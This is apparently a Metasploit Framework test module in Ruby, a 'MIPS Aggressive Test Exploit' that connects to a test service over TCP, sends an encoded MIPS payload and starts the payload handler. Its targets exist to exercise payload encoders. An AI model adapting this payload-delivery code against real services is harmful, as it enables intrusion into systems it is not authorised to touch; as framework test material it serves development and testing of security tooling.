##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MIPS Aggressive Test Exploit',
			'Description'    => 	
				"This module tests the exploitation of a test service.",
			'Author'         => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			#'Arch'           => ARCH_MIPSBE,
			'Payload'        =>
				{
					'MaxNops'  => 0,
					#'BadChars' => "\x00",
					#'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					# Target 0: Universal
					[ 
						'Mips big endian',
						{
							'Platform' => [ 'linux', 'win' ],
							'Arch'     => ARCH_MIPSBE
						}
					],
						[ 
						'Mips big endian cannot be encoded',
						{
							'Platform' => [ 'linux', 'win' ],
							'Arch'     => ARCH_MIPSBE,
							'Payload'  => 
								{
									'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
								}
						}
					],				[
						'Mips big endian encoder needed',
						{
							'Platform' => [ 'linux', 'win' ],
							'Arch'     => ARCH_MIPSBE,
							'Payload'  => 
								{
									'BadChars' => "\x00"
								}
						}
					],
					[ 
						'Mips little endian',
						{
							'Platform' => [ 'linux', 'win' ],
							'Arch'     => ARCH_MIPSLE
						}
					],
						[ 
						'Mips little endian cannot be encoded',
						{
							'Platform' => [ 'linux', 'win' ],
							'Arch'     => ARCH_MIPSLE,
							'Payload'  => 
								{
									'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
								}
						}
					],				[
						'Mips little endian encoder needed',
						{
							'Platform' => [ 'linux', 'win' ],
							'Arch'     => ARCH_MIPSLE,
							'Payload'  => 
								{
									'BadChars' => "\x00"
								}
						}
					],


				],
			'DefaultTarget' => 0))

		register_options(
			[
				OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
				OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
			])
	end

	def check
		return Exploit::CheckCode::Vulnerable
	end

	def exploit
		# Show disassembled payload for context encoder test
		if target.name =~ /context encoder/
			#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
			#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
		end

		connect

		print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")

		sock.put(payload.encoded)

		if (datastore['WaitForInput'])
			puts "Type something..."
			gets
		end

		handler
	end

end